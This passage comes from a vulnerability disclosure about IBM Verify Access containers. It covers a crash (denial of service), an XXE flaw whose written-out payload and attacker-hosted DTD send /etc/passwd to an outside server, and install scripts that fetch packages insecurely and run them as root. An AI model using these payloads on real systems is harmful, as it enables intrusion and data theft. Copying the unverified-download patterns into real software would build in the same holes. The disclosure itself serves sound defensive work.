\u003c_ZN12DSessWrapper4pingEPv+172\u003e:      mov    rdi,QWORD PTR [rsp+0x18]\n       0x7fecb007a5a1 \u003c_ZN12DSessWrapper4pingEPv+177\u003e:      mov    rax,QWORD PTR [rdi]\n       0x7fecb007a5a4 \u003c_ZN12DSessWrapper4pingEPv+180\u003e:      call   QWORD PTR [rax+0x2f0]\n    [------------------------------------stack-------------------------------------]\n    0000| 0x7feca642fc10 --\u003e 0x1d2e480 --\u003e 0x7fecaf4dfbf8 --\u003e 0x7fecaf292870 --\u003e 0x410024f509058b48 \n    0008| 0x7feca642fc18 --\u003e 0x7fecaf292d8e --\u003e 0xda89481d74c08548 \n    0016| 0x7feca642fc20 --\u003e 0x7fec28040830 --\u003e 0x7fecaf4e00a0 --\u003e 0x7fecaf29b5a0 --\u003e 0x4100246a21058b48 \n    0024| 0x7feca642fc28 --\u003e 0x1e3f6e0 --\u003e 0x7fecaf4e1120 --\u003e 0x7fecaf2b2450 --\u003e 0x530022f9a9058b48 \n    0032| 0x7feca642fc30 --\u003e 0x7feca642fc80 --\u003e 0x7feca642fc90 --\u003e 0x7fec30071c00 --\u003e 0x50 (\u0027P\u0027)\n    0040| 0x7feca642fc38 --\u003e 0x7fec3800e720 --\u003e 0x7fecaf4dece8 --\u003e 0x7fecaf27a770 --\u003e 0x4800267369058b48 \n    0048| 0x7feca642fc40 --\u003e 0x7fec38006110 --\u003e 0x7fecaf4df160 --\u003e 0x7fecaf280e20 --\u003e 0x4100261081058b48 \n    0056| 0x7feca642fc48 --\u003e 0x7fecaf27a8a1 --\u003e 0xf2e668debc48941 \n    [------------------------------------------------------------------------------]\n    Legend: code, data, rodata, value\n    Stopped reason: SIGSEGV\n    0x00007fecb007a595 in DSessWrapper::ping(void*) () from target:/lib64/libamdsc_interface.so\n    gdb-peda$ bt\n    #0  0x00007fecb007a595 in DSessWrapper::ping(void*) () from target:/lib64/libamdsc_interface.so\n    #1  0x00007fecaf27a8a1 in tivsec_axiscpp::ServerAxisEngine::invoke(tivsec_axiscpp::MessageData*) () from target:/lib64/libtivsec_axis_server.so\n    #2  0x00007fecaf27b0d2 in tivsec_axiscpp::ServerAxisEngine::process(tivsec_axiscpp::SOAPTransport*) () from target:/lib64/libtivsec_axis_server.so\n    #3  0x00007fecaf297156 in process_request(tivsec_axiscpp::SOAPTransport*) () from target:/lib64/libtivsec_axis_server.so\n    #4  0x00007fecb02a3293 in AMWSMSServiceClient::processRequest(AMWSMSService::WorkerRequest\u0026, bool) () from target:/lib64/libamdsc_server.so\n    #5  0x00007fecb02a3ff8 in AMWSMSService::workerThreadRun() () from target:/lib64/libamdsc_server.so\n    #6  0x00007fecb02a4089 in start_worker_thread () from target:/lib64/libamdsc_server.so\n    #7  0x00007fecaec801ca in start_thread () from target:/lib64/libpthread.so.0\n    #8  0x00007fecae6d3d83 in clone () from target:/lib64/libc.so.6\n\nI can also confirm the null pointer dereference in the `dmesg` output of the `container-02` test server:\n\n    [899328.145854] dscd[2106406]: segfault at 0 ip 00007f18e53ff595 sp 00007f18db93ac10 error 4 in libamdsc_interface.so[7f18e53ec000+30000]\n    [899485.595069] dscd[2107491]: segfault at 0 ip 00007f25a6041595 sp 00007f259c9cdc10 error 4 in libamdsc_interface.so[7f25a602e000+30000]\n    [899575.542524] dscd[2109718]: segfault at 0 ip 00007f331fde5595 sp 00007f3316938c10 error 4 in libamdsc_interface.so[7f331fdd2000+30000]\n    [899614.404309] dscd[2111181]: segfault at 0 ip 00007fec9cad4595 sp 00007fec9d29dc10 error 4 in libamdsc_interface.so[7fec9cac1000+30000]\n    [899761.869511] dscd[2112040]: segfault at 0 ip 00007f86cf8a0595 sp 00007f86c5edfc10 error 4 in libamdsc_interface.so[7f86cf88d000+30000]\n\nI can confirm the verify-access-dsc instance crashes on container-02 as shown below. \n\nBefore the PoC, the verify-access-dsc instance is running:\n\n    [root@container-02]# podman ps\n    CONTAINER ID  IMAGE                                                COMMAND       CREATED       STATUS                       PORTS                             NAMES\n    e462789b901b  ibmcom/verify-access-runtime/10.0.4.0:20220926.6                     28 hours ago  Up 28 hours ago (healthy)    0.0.0.0:9443-\u003e9443/tcp            verify-access-runtime\n    0ff1b85073d6  ibmcom/verify-access-dsc/10.0.4.0:20220926.6                         28 hours ago  Up 28 minutes ago (healthy)  0.0.0.0:8443-8444-\u003e8443-8444/tcp  verify-access-dsc\n\nAfter the PoC, the verify-access-dsc instance does not run anymore:\n\n    [root@container-02]# podman ps\n    CONTAINER ID  IMAGE                                                COMMAND       CREATED       STATUS                     PORTS                     NAMES\n    e462789b901b  ibmcom/verify-access-runtime/10.0.4.0:20220926.6                     28 hours ago  Up 28 hours ago (healthy)  0.0.0.0:9443-\u003e9443/tcp    verify-access-runtime\n    [root@container-02]#\n\nAn attacker with the dsc-client SSL certificate can crash the DSC servers and crash the entire authentication system. \n\n\n\n## Details - XML External Entity (XXE) in dscd \n\nIt was observed that the DSC (Distributed Session Cache) servers are vulnerable to XML External Entity (XXE) attacks. DSC servers are used to store session information. \n\nThe DSC servers are reachable using the `/DSess/services/DSess` API running on port 8443/tcp. \n\nWith a client certificate, we can reach the `/DSess/services/DSess` API. \n\nContent of the `payload.txt` file containing the XXE payload that will be sent to the remote DSC server:\n\n    \u003c?xml version=\"1.0\" encoding=\"utf-8\" ?\u003e\n    \u003c!DOCTYPE foo [\n    \u003c!ENTITY % xxe SYSTEM \"http://10.0.0.45/dtd.xml\"\u003e\n    %xxe;\n    ]\u003e\n    \u003cfoo\u003e\u003c/foo\u003e\n    \u003cSOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\u003e\n            \u003cSOAP-ENV:Body\u003e\n                    \u003cns1:ping xmlns:ns1=\"http://sms.am.tivoli.com\"\u003e\n                            \u003cns1:something\u003eX\u003c/ns1:something\u003e\n                    \u003c/ns1:ping\u003e\n            \u003c/SOAP-ENV:Body\u003e\n    \u003c/SOAP-ENV:Envelope\u003e\n\n\nContent of the `dtd.xml` file hosted on http://10.0.0.45/. This DTD file is referenced by the `payload.txt` file:\n\n    kali% cat /var/www/html/dtd.xml \n    \u003c!ENTITY % file SYSTEM \"file:///etc/passwd\"\u003e\n    \u003c!ENTITY % eval \"\u003c!ENTITY \u0026#x25; exfiltrate SYSTEM \u0027http://10.0.0.45/?x=%file;\u0027\u003e\"\u003e\n    %eval;\n    %exfiltrate;\n\nSending the previous payload will result in an exception on the remote DSC server:\n\n    kali% curl --key dsc-client.key --cert dsc-client.pem --show-error --insecure https://dsc-02.test.lan:8443/DSess/services/DSess -H \u0027SOAPAction: \"ping\"\u0027 --data \u0027@payload.txt\u0027 -v\n    *   Trying 10.0.0.16:8443... \n    * Connected to dsc-02.test.lan (10.0.0.16) port 8443 (#0)\n    [...]\n    \u003e POST /DSess/services/DSess HTTP/1.1\n    \u003e Host: dsc-02.test.lan:8443\n    \u003e User-Agent: curl/7.82.0\n    \u003e Accept: */*\n    \u003e SOAPAction: \"ping\"\n    \u003e Content-Length: 453\n    \u003e Content-Type: application/x-www-form-urlencoded\n    \u003e \n    * Mark bundle as not supporting multiuse\n    \u003c HTTP/1.1 200 OK\n    \u003c Server: Apache Axis C++/1.6.a\n    \u003c Connection: close\n    \u003c Content-Length: 330\n    \u003c Content-Type: text/xml\n    \u003c \n    \u003c?xml version=\u00271.0\u0027 encoding=\u0027utf-8\u0027 ?\u003e\n    \u003cSOAP-ENV:Envelope\u003e\n    \u003cSOAP-ENV:Body\u003e\n    \u003cSOAP-ENV:Fault\u003e\n    \u003cfaultcode\u003eSOAP-ENV:Server\u003c/faultcode\u003e\n    \u003cfaultstring\u003eUnknown exception\u003c/faultstring\u003e\n    \u003cfaultactor\u003eserver name:listen port\u003c/faultactor\u003e\n    \u003cdetail\u003eUnknown Exception has occured\u003c/detail\u003e\n    \u003c/SOAP-ENV:Fault\u003e\n    \u003c/SOAP-ENV:Body\u003e\n    \u003c/SOAP-ENV:Envelope\u003e\n    \n    * Closing connection 0\n    * TLSv1.2 (OUT), TLS alert, close notify (256):\n\n\nAt the same time, when sniffing the HTTP connections to the remote HTTP server providing `http://10.0.0.45/?x=%file`, we can observe HTTP requests from the DSC server (acting as a HTTP client). \n\nThere is a successful exfiltration of the `/etc/passwd` file of the DSC instance - this file was specified in the `dtd.xml` file at `http://10.0.0.45/dtd.xml`, used by the malicious payload:\n\n    kali# tcpdump -n -i eth0 -s0 -X port 80\n    tcpdump: verbose output suppressed, use -v[v]... for full protocol decode\n    listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes\n    10:01:12.655204 IP 10.0.0.16.60254 \u003e 10.0.0.45.80: Flags [P.], seq 1:753, ack 1, win 229, options [nop,nop,TS val 2959987485 ecr 3936552717], length 752: HTTP: GET /root:x:0:0:root:/root:/bin/bash\n    [...]\n        0x0030:  eaa3 070d 4745 5420 2f72 6f6f 743a 783a  ....GET./root:x:\n        0x0040:  303a 303a 726f 6f74 3a2f 726f 6f74 3a2f  0:0:root:/root:/\n        0x0050:  6269 6e2f 6261 7368 0a62 696e 3a78 3a31  bin/bash.bin:x:1\n        0x0060:  3a31 3a62 696e 3a2f 6269 6e3a 2f73 6269  :1:bin:/bin:/sbi\n        0x0070:  6e2f 6e6f 6c6f 6769 6e0a 6461 656d 6f6e  n/nologin.daemon\n        0x0080:  3a78 3a32 3a32 3a64 6165 6d6f 6e3a 2f73  :x:2:2:daemon:/s\n        0x0090:  6269 6e3a 2f73 6269 6e2f 6e6f 6c6f 6769  bin:/sbin/nologi\n        0x00a0:  6e0a 6164 6d3a 783a 333a 343a 6164 6d3a  n.adm:x:3:4:adm:\n        0x00b0:  2f76 6172 2f61 646d 3a2f 7362 696e 2f6e  /var/adm:/sbin/n\n        0x00c0:  6f6c 6f67 696e 0a6c 703a 783a 343a 373a  ologin.lp:x:4:7:\n        0x00d0:  6c70 3a2f 7661 722f 7370 6f6f 6c2f 6c70  lp:/var/spool/lp\n        0x00e0:  643a 2f73 6269 6e2f 6e6f 6c6f 6769 6e0a  d:/sbin/nologin. \n        0x00f0:  7379 6e63 3a78 3a35 3a30 3a73 796e 633a  sync:x:5:0:sync:\n        0x0100:  2f73 6269 6e3a 2f62 696e 2f73 796e 630a  /sbin:/bin/sync. \n        0x0110:  7368 7574 646f 776e 3a78 3a36 3a30 3a73  shutdown:x:6:0:s\n        0x0120:  6875 7464 6f77 6e3a 2f73 6269 6e3a 2f73  hutdown:/sbin:/s\n        0x0130:  6269 6e2f 7368 7574 646f 776e 0a68 616c  bin/shutdown.hal\n        0x0140:  743a 783a 373a 303a 6861 6c74 3a2f 7362  t:x:7:0:halt:/sb\n        0x0150:  696e 3a2f 7362 696e 2f68 616c 740a 6d61  in:/sbin/halt.ma\n        0x0160:  696c 3a78 3a38 3a31 323a 6d61 696c 3a2f  il:x:8:12:mail:/\n        0x0170:  7661 722f 7370 6f6f 6c2f 6d61 696c 3a2f  var/spool/mail:/\n        0x0180:  7362 696e 2f6e 6f6c 6f67 696e 0a6f 7065  sbin/nologin.ope\n        0x0190:  7261 746f 723a 783a 3131 3a30 3a6f 7065  rator:x:11:0:ope\n        0x01a0:  7261 746f 723a 2f72 6f6f 743a 2f73 6269  rator:/root:/sbi\n        0x01b0:  6e2f 6e6f 6c6f 6769 6e0a 6761 6d65 733a  n/nologin.games:\n        0x01c0:  783a 3132 3a31 3030 3a67 616d 6573 3a2f  x:12:100:games:/\n        0x01d0:  7573 722f 6761 6d65 733a 2f73 6269 6e2f  usr/games:/sbin/\n        0x01e0:  6e6f 6c6f 6769 6e0a 6674 703a 783a 3134  nologin.ftp:x:14\n        0x01f0:  3a35 303a 4654 5020 5573 6572 3a2f 7661  :50:FTP.User:/va\n        0x0200:  722f 6674 703a 2f73 6269 6e2f 6e6f 6c6f  r/ftp:/sbin/nolo\n        0x0210:  6769 6e0a 6e6f 626f 6479 3a78 3a36 3535  gin.nobody:x:655\n        0x0220:  3334 3a36 3535 3334 3a4b 6572 6e65 6c20  34:65534:Kernel. \n        0x0230:  4f76 6572 666c 6f77 2055 7365 723a 2f3a  Overflow.User:/:\n        0x0240:  2f73 6269 6e2f 6e6f 6c6f 6769 6e0a 6973  /sbin/nologin.is\n        0x0250:  616d 3a78 3a36 3030 303a 3630 3030 3a3a  am:x:6000:6000::\n        0x0260:  2f68 6f6d 652f 6973 616d 3a2f 6269 6e2f  /home/isam:/bin/\n        0x0270:  6261 7368 0a69 766d 6772 3a78 3a36 3030  bash.ivmgr:x:600\n        0x0280:  313a 3630 3031 3a41 6363 6573 7320 4d61  1:6001:Access.Ma\n        0x0290:  6e61 6765 7220 5573 6572 3a2f 6f70 742f  nager.User:/opt/\n        0x02a0:  506f 6c69 6379 4469 7265 6374 6f72 3a2f  PolicyDirector:/\n        0x02b0:  6269 6e2f 6661 6c73 650a 7469 766f 6c69  bin/false.tivoli\n        0x02c0:  3a78 3a36 3030 323a 3630 3032 3a4f 776e  :x:6002:6002:Own\n        0x02d0:  6572 206f 6620 5469 766f 6c69 2043 6f6d  er.of.Tivoli.Com\n    [...]\n\nAn attacker can read any file located in the instance - the DSC server will send any file specified in the payload to an attacker-controlled HTTP server. \n\nAn attacker with the dsc-client SSL certificate can exfiltrate any sensitive information from the instance. \n\n\n\n## Details - Remote Code Execution due to insecure download of rpm and zip files in verify-access-dsc, verify-access-runtime and verify-access-wrp (/usr/sbin/install_isva.sh)\n\nIt was observed that the Docker images verify-access-dsc ,verify-access-runtime and verify-access-wrp use insecure communications to download several rpm and zip files that will then be installed or decompressed as root. \n\nThe `/usr/sbin/install_isva.sh` script contains insecure downloading of rpm files and zip files. These rpm files will then be installed as root. \n\nAn attacker located on the network can inject malicious rpm or zip files into the authentication platform and take control over the entire authentication platform. \n\nThere are 3 different `/usr/sbin/install_isva.sh` scripts found in these images but they share the same vulnerable code:\n\n    kali-docker# sha256sum **/install_isva.sh   \n    1c851f579baeda9d3c11e7721aaa5960dc6a3d6b052bcc8a46979d0634e31892  _verify-access-dsc.tar/787d9cec79e27fccd75a56b7101b39da38161f9d3749d6d0fd7cfcc8252aca34/usr/sbin/install_isva.sh\n    00f2ca8ad004af9c9e16b6cfdf480dcdb52dc36c7ff64df2bcc34495f6a9ae8d  _verify-access-runtime.tar/694cb5f84eff9a4b0aac37a4bd9f65116051953f3aee5e4e998af5938e684a5e/usr/sbin/install_isva.sh\n    8a59d7f89c6d587d9b764b9e4748cf0d20d406f65433a813464b32a13745f6da  _verify-access-wrp.tar/937031a6ab4bc7bd504dcbee8d242f181e904c1722489077cf468daae176e2da/usr/sbin/install_isva.sh\n\nVulnerable code in verify-access-dsc - download over HTTP or without checking the SSL certificate (lines 24, 60 and 82) and installation of packages as root without checking the signatures (line 76):\n\nContent of `/usr/sbin/install_isva.sh` in verify-access-dsc:\n\n[code:shell]\n22 files=/root/files.txt\n23 \n24 curl -k ${WEBSERVER}/ -o $files \n[...]\n38 #\n39 # Install each of our RPMs. \n40 #\n41 \n42 pkgs=\"gskcrypt64 \\\n43         gskssl64 \\\n44         Base-ISVA \\\n45         idsldap-license64 \\\n46         idsldap-cltbase64 \\\n47         idsldap-clt64bit64 \\\n48         Pdlic-PD \\\n49         TivSecUtl-TivSec \\\n50         PDRTE-PD \\\n51         PDWebRTE-PD \\\n52         PDWebDSC-PD\"\n53 \n54 for pkg in $pkgs; do\n55     echo \"Installing $pkg\"\n56 \n57     # Download and install the file. \n58     rpm_file=`locate_rpm_file $pkg`\n59 \n60     curl -fail -s -k ${WEBSERVER}/$rpm_file -o /root/$rpm_file\n[...]\n76     rpm -i $extra_args /root/$rpm_file\n[...]\n78     # Download the include file and delete all files not included in the file. \n79     include=`rpm -qp /root/$rpm_file --qf \"%{NAME}.include\"`\n80     include_file=/root/$include\n81 \n82     set +e; curl --fail -s -k ${WEBSERVER}/$include -o $include_file; rc=$?; set -e\n83 \n84     if [ $rc -eq 0 -a -f $include_file ] ; then\n85         # Convert the include file to be regular expression based instead of\n86         # glob based. \n87         sed -i \"s|\\*|.*|g\" $include_file\n88 \n89         for entry in `rpm -ql /root/$rpm_file | grep -xvf $include_file`; do\n90             if [ -f $entry ] ; then\n91                 rm -f $entry\n92             fi\n93         done\n94     fi\n[/code]\n\nThe code in verify-access-wrp is also very similar and shares the same vulnerabilities. \n\nVulnerable code in verify-access-runtime - same vulnerability in `/usr/sbin/install_isva.sh` with an additional vulnerability with the insecure download, due to the `-k` option on line 117 (alias to `--insecure`) and extraction of zip files as root in line 119:\n\n[code:shell]\n28 files=/root/files.txt\n29 \n30 curl -k ${WEBSERVER}/ -o $files\n[...]\n41 pkgs=\"gskcrypt64 \\\n42         gskssl64 \\\n43         Base-ISVA \\\n44         PDlic-PD \\\n45         TivSecUtl-TivSec \\\n46         PDRTE-PD \\\n47         PDWebWAPI-PD \\\n48         PDWebDSC-PD \\\n49         VerifyAccessRuntimeFeatures \\\n50         MesaConfig \\\n51         FIM \\\n52         RBA\"\n53 \n54 for pkg in $pkgs; do\n55     echo \"Installing $pkg\"\n56 \n57     # Download and install the file. \n58     rpm_file=`locate_rpm_file $pkg`\n59 \n60     curl --fail -s -k ${WEBSERVER}/$rpm_file -o /root/$rpm_file\n[...]\n78     rpm -i $extra_args /root/$rpm_file\n79 \n80     # Download the include file and delete all files not included in the file. \n81     include=`rpm -qp /root/$rpm_file --qf \"%{NAME}.include\"`\n82     include_file=/root/$include\n83 \n84     set +e; curl --fail -s -k ${WEBSERVER}/$include -o $include_file; rc=$?; set -e\n85 \n86     if [ $rc -eq 0 -a -f $include_file ] ; then\n87         # Convert the include file to be regular expression based instead of\n88         # glob based. \n89         sed -i \"s|\\*|.*|g\" $include_file\n90 \n91         for entry in `rpm -ql /root/$rpm_file | grep -xvf $include_file`; do\n92             if [ -f $entry ] ; then\n93                 rm -f $entry\n94             fi\n95         done\n96     fi\n[...]\n108 zips=\"\\\n109     com.ibm.tscc.rtss.wlp.zip:/opt/rtss \\\n110     com.ibm.isam.common.eclipse.wlp.zip:/opt/IBM \\\n111     pdjrte-0.0.0-0.zip:/opt\"\n112 \n113 for entry in $zips; do\n114     zip=`echo $entry | cut -f 1 -d \u0027:\u0027`\n115     dst=`echo $entry | cut -f 2 -d \u0027:\u0027`\n116 \n117     curl --fail -s -k ${WEBSERVER}/$zip -o /root/$zip\n118     mkdir -p $dst\n119     unzip -q /root/$zip -d $dst\n120 \n121     rm -f /root/$zip\n122 done\n[/code]\n\n\n\n## Details - Remote Code Execution due to insecure download of rpm in verify-access-runtime (/usr/sbin/install_java_liberty.sh)\n\nIt was observed that the Docker image verify-access-runtime insecurely downloads zip files. \n\nAn attacker located on the network can inject malicious zip files into the platform and take control over the entire platform. \n\nThe `/usr/sbin/install_java_liberty.sh` script contains insecure downloading of zip files. These zip files will then be extracted as root into the `/opt/java`, `/opt/ibm`, `/opt/oracle/jdbc` and `/opt/IBM/db2` directories, providing WebSphere Liberty binaries (that will then be used to provide executable code). \n\nIt is also possible to remotely delete any file as root (lines 61 to 65). \n\nVulnerable code in `/usr/sbin/install_java_liberty.sh`:\n\n[code:shell]\n14 web_files=/root/files.txt\n15 \n16 locate_file()\n17 {\n18     grep \"$1\" $web_files | cut -f 2 -d \u0027\"\u0027\n19 }\n20 curl -k ${WEBSERVER}/ -o $web_files\n21\n[...]\n29 #\n30 # Install each of our zip files. \n31 #\n32 \n33 zips=\"\\\n34     ibm-semeru-open-jre_x64_linux_11.*.tar.gz:/opt/java \\\n35     liberty.*.zip:/opt/ibm \\\n36     oracle_jdbc_.*.zip:/opt/oracle/jdbc \\\n37     ibm-db2-jdbc.*.tar.gz:/opt/IBM/db2\"\n38 \n39 for entry in $zips; do\n40     zip=`echo $entry | cut -f 1 -d \u0027:\u0027`\n41     dst=`echo $entry | cut -f 2 -d \u0027:\u0027`\n42 \n43     # Download and install the file. \n44     zip_file=`locate_file $zip`\n45 \n46     curl --fail -s -k ${WEBSERVER}/$zip_file -o /root/$zip_file\n47 \n48     mkdir -p $dst\n49 \n50     set +e; echo $zip | grep -q .zip; rc=$?; set -e\n51     if [ $rc -eq 0 ] ; then\n52         unzip -q /root/$zip_file -d $dst\n53         exclude=`echo $zip_file | sed \"s|.zip|.exclude|g\"`\n54     else\n55         tar -x -C $dst -f /root/$zip_file\n56         exclude=`echo $zip_file | sed \"s|.tar.gz|.exclude|g\"`\n57     fi\n58 \n59     exclude_file=/root/$exclude\n60 \n61     set +e; curl --fail -s -k ${WEBSERVER}/$exclude -o $exclude_file; rc=$?; set -e\n62 \n63     if [ $rc -eq 0 -a -s $exclude_file ] ; then\n64         cd $dst\n65         cat $exclude_file | xargs rm -rf\n66     fi\n[/code]\n\n\n\n## Details - Remote Code Execution due to insecure Repository configuration\n\nIt was observed that the Docker images verify-access-dsc, verify-access-runtime and verify-access-wrp use insecure CentOS repositories:\n\n- - The transport is done over HTTP (in clear-text) - instead of HTTPS. \n- - The check of the signature is disabled. \n- - These repositories will be enabled by default. \n\nAn attacker located on the network (local network or any Internet router located between the instance and the remote mirror.centos.org server) can inject malicious RPMs and take control over the entire platform. \n\nThe `/usr/sbin/install_system.sh` script in these 3 images will enable 4 remote repositories over HTTP and will disable the check of signature of the downloaded packages from these repositories:\n\n     31 centos_repo_file=\"/etc/yum.repos.d/centos.repo\"\n     32 \n     33 cat \u003c\u003cEOT \u003e\u003e $centos_repo_file\n     34 [CentOS-8_base]\n     35 name = CentOS-8 - Base\n     36 baseurl = http://mirror.centos.org/centos/8-stream/BaseOS/x86_64/os\n     37 gpgcheck = 0\n     38 enabled = 1 \n     39 \n     40 [CentOS-8_appstream]\n     41 name = CentOS-8 - AppStream\n     42 baseurl = http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os\n     43 gpgcheck = 0        \n     44 enabled = 1\n     45 EOT\n    [...]\n     98 #\n     99 # Enable install of the busybox RPM from the Fedora repository. \n    100 #\n    101 \n    102 fedora_repo_file=\"/etc/yum.repos.d/fedora.repo\"\n    103 \n    104 cat \u003c\u003cEOT \u003e\u003e $fedora_repo_file\n    105 [fedora]                                                                                                                                                                                        \n    106 name=Fedora                                                                                                                                                                                     \n    107 metalink=https://mirrors.fedoraproject.org/metalink?repo=fedora-33\u0026arch=x86_64\n    108 enabled=1\n    109 gpgcheck=0\n    110 \n    111 [fedora-updates]\n    112 name=Fedora Updates\n    113 metalink=https://mirrors.fedoraproject.org/metalink?repo=updates-released-f33\u0026arch=x86_64\n    114 enabled=1\n    115 gpgcheck=0\n    116 EOT\n\nIt was confirmed that this configuration appears in the verify-access-runtime instance in the live system:\n\n    [root@container-01]# for i in $(podman ps | grep -v NAMES | awk \u0027{ print $1 }\u0027); do podman ps | grep $i; podman exec -it $i cat /etc/yum.repos.d/centos.repo;echo;done\n    4262005f3646  ibmcom/verify-access/10.0.4.0:20221006.1                         7 hours ago  Up 7 hours ago (healthy)  0.0.0.0:7443-\u003e9443/tcp            verify-access\n    cat: /etc/yum.repos.d/centos.repo: No such file or directory\n    \n    c930c46acd66  ibmcom/verify-access-runtime/10.0.4.0:20221006.1                        7 hours ago  Up 7 hours ago (healthy)  0.0.0.0:9443-\u003e9443/tcp            verify-access-runtime\n    name = CentOS-8 - Base\n    baseurl = http://mirror.centos.org/centos/8-stream/BaseOS/x86_64/os\n    gpgcheck = 0\n    enabled = 1\n    \n    [CentOS-8_appstream]\n    name = CentOS-8 - AppStream\n    baseurl = http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os\n    gpgcheck = 0\n    enabled = 1\n    \n    48f1b1e8f782  ibmcom/verify-access-dsc/10.0.4.0:20221006.1                            7 hours ago  Up 7 hours ago (healthy)  0.0.0.0:8443-8444-\u003e8443-8444/tcp  verify-access-dsc\n    cat: /etc/yum.repos.d/centos.repo: No such file or directory\n    \n    [root@container-01]#\n\nFurthermore, the script `/usr/sbin/install_system.sh` will insecurely download programs and install them as root, using the previous insecure repositories:\n\n[code:shell]\n 48 # Install tools required for container build process. \n 49 #\n 50 \n 51 microdnf -y install unzip shadow-utils jansson openssl libxslt \\\n 52         libnsl2 gzip cpio tar\n[...]\n 55 # We have an issue where RedHat periodically introduces a dependency on\n 56 # openssl-pkcs11.  We don\u0027t actually need this package and so we manually remove\n 57 # it if it has been installed. \n 58 #\n 59 \n 60 if [ `rpm -q -a | grep openssl-pkcs11 | wc -l` -ne 0 ] ; then\n 61     rpm --erase openssl-pkcs11\n 62 fi\n[...]\n 70 rpms=\"\"\n 71 for lang in en cs de es fi fr hu it ja ko nl pl pt ru zh; do\n 72     rpms=\"$rpms glibc-langpack-$lang\"\n 73 done\n[...]\n122 microdnf -y install busybox\n[/code]\n\n\n\n## Details - Additional repository configuration (potential supply-chain attack)\n\nIt was observed that the Docker images verify-access-runtime and verify-access-wrp use a third-party repository configuration, obtained when retrieving the external file at `https://repo.symas.com/configs/SOFL/rhel8/sofl.repo`:\n\nContent of `/usr/sbin/install_system.sh`:\n\n[code:shell]\n47 #\n48 # Install OpenLDAP.  This is no longer provided by CentOS. \n49 #\n50 \n51 sofl_repo_file=\"/etc/yum.repos.d/sofl.repo\"\n52 \n53 curl https://repo.symas.com/configs/SOFL/rhel8/sofl.repo \\\n54     -o $sofl_repo_file\n[/code]\n\nIt was confirmed that this configuration appears in the verify-access-runtime instance in the live system:\n\n    [isam@verify-access-runtime /]$ cat /etc/yum.repos.d/sofl.repo \n    [sofl]\n    name=Symas OpenLDAP for Linux RPM repository\n    baseurl=https://repo.symas.com/repo/rpm/SOFL/rhel8\n    gpgkey=https://repo.symas.com/repo/gpg/RPM-GPG-KEY-symas-com-signing-key\n    gpgcheck=1\n    enabled=1\n    [isam@verify-access-runtime /]$\n\nWhen reading the `/usr/sbin/install_system.sh` script, this repository is used to install an additional package, without checking the signature:\n\n[code:shell]\n58 #\n59 # We want to manually install the openldap server RPM as microdnf pulls\n60 # in a whole heap of dependencies which we don\u0027t require. \n61 #\n62 \n63 baseurl=`grep baseurl $sofl_repo_file | cut -f 2 -d \u0027=\u0027`/x86_64\n64 version=`rpm -q --qf \"%{VERSION}-%{RELEASE}\" symas-openldap`\n65 rpmfile=/tmp/openldap.rpm\n66 \n67 curl $baseurl/symas-openldap-servers-$version.x86_64.rpm -o $rpmfile\n68 \n69 rpm -i --nodeps $rpmfile\n70 \n71 rm -f $rpmfile\n[/code]\n\nThere is a potential supply-chain attack and this dependency is not documented. \n\n\n\n## Details - Remote Code Execution due to insecure /usr/sbin/install_system.sh script in verify-access-runtime\n\nIt was observed that the Docker image verify-access-runtime uses a highly insecure `/usr/sbin/install_system.sh` script. \n\nWith the 2 previous vulnerabilities already explained in Additional repository configuration (potential supply-chain attack) and\nRemote Code Execution due to insecure download of rpm and zip files in verify-access-dsc, verify-access-runtime and verify-access-wrp (/usr/sbin/install_isva.sh),\nthis version adds 2 new vulnerabilities:\n\n- - Installation of 3 packages downloaded over HTTP without checking the signature (lines 82, 84 and 90); and\n- - Replacement of `/usr/share/java/postgresql-jdbc/postgresql.jar` using a postgresql.jar file directly retrieved over HTTP (line 99) and with `-k` (aka `--insecure`). \n\nContent of `/usr/sbin/install_system.sh`:\n\n[code:shell]\n73 #\n74 # For the postgresql packages we need to download and install manually so\n75 # that we don\u0027t also pull in all of the unnecessary dependencies. \n76 #\n77 \n78 centos_base=http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os/Packages/\n79 \n80 rpms=/tmp/rpms.txt\n81 \n82 curl http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os/Packages/ -o $rpms\n83 \n84 for pkg in postgresql-12 postgresql-server-12 postgresql-jdbc-42; do\n85     rpm_file=`grep $pkg $rpms | tail -n 1 | \\\n86                     sed \u0027s|.*href=\"||g\u0027 | cut -f 1 -d \u0027\"\u0027`\n87 \n88     echo \"Installing: $rpm_file\"\n89 \n90     rpm -i --nodeps $centos_base/$rpm_file\n91 done\n92 \n93 rm -f $rpms\n94 \n95 #\n96 # Need a more current jar then what is part of the postges-jdbc rpm\n97 #\n98 postgres_jar=`locate_file postgresql-.*.jar`\n99 curl -kv ${WEBSERVER}/$postgres_jar -o /usr/share/java/postgresql-jdbc/postgresql.jar\n[/code]\n\nAn attacker located on the network (local network or any Internet router located between the instance and the remote mirror.centos.org server) can inject malicious rpm or a malicious .jar file and take control over the entire platform. \n\nNote that IBM does not consider this vulnerability since the script is supposed to be executed in a secure network. \n\n\n\n## Details - Remote Code Execution due to insecure reload script in verify-access-runtime\n\nIt was observed that the Docker image verify-access-runtime uses a highly insecure reload script. \n\nAn attacker located on the network can inject a malicious snapshot file into the platform or MITM the connection to a server containing the snapshot image and take control over the entire platform. \n\nThis script is defined at the end of the `/usr/sbin/install_system.sh` script: \n\nContent of `/usr/sbin/install_system.sh` in verify-access-runtime:\n\n[code:shell]\n239 #\n240 # Ensure that the reload script is executable. \n241 #\n242 \n243 mv /sbin/reload.sh /sbin/runtime_reload\n244 \n245 chmod 755 /sbin/runtime_reload\n[/code]\n\nAnalysis of `/sbin/runtime_reload`:\n\nThe function `download_from_cfgsvc()` is insecure as the curl command uses the `-k` option (as known as `--insecure`) to download and install a snapshot into the instance: any invalid SSL certificate for the remote server will be accepted because of the `-k` option. \n\nWe can also see that Postgres does not have passwords in line 144, already found in [Lack of authentication in Postgres inside verify-access-runtime](#no-auth-postgres). \n\n\n\n[code:shell]\n 67 #############################################################################\n 68 # Attempt to download the snapshot from the configuration service. \n 69 \n 70 download_from_cfgsvc()\n 71 {\n 72     # No need to download the snapshot if the configuration service has not\n 73     # been defined. \n 74     if [ -z \"$CONFIG_SERVICE_URL\" ] ; then\n 75         return\n 76     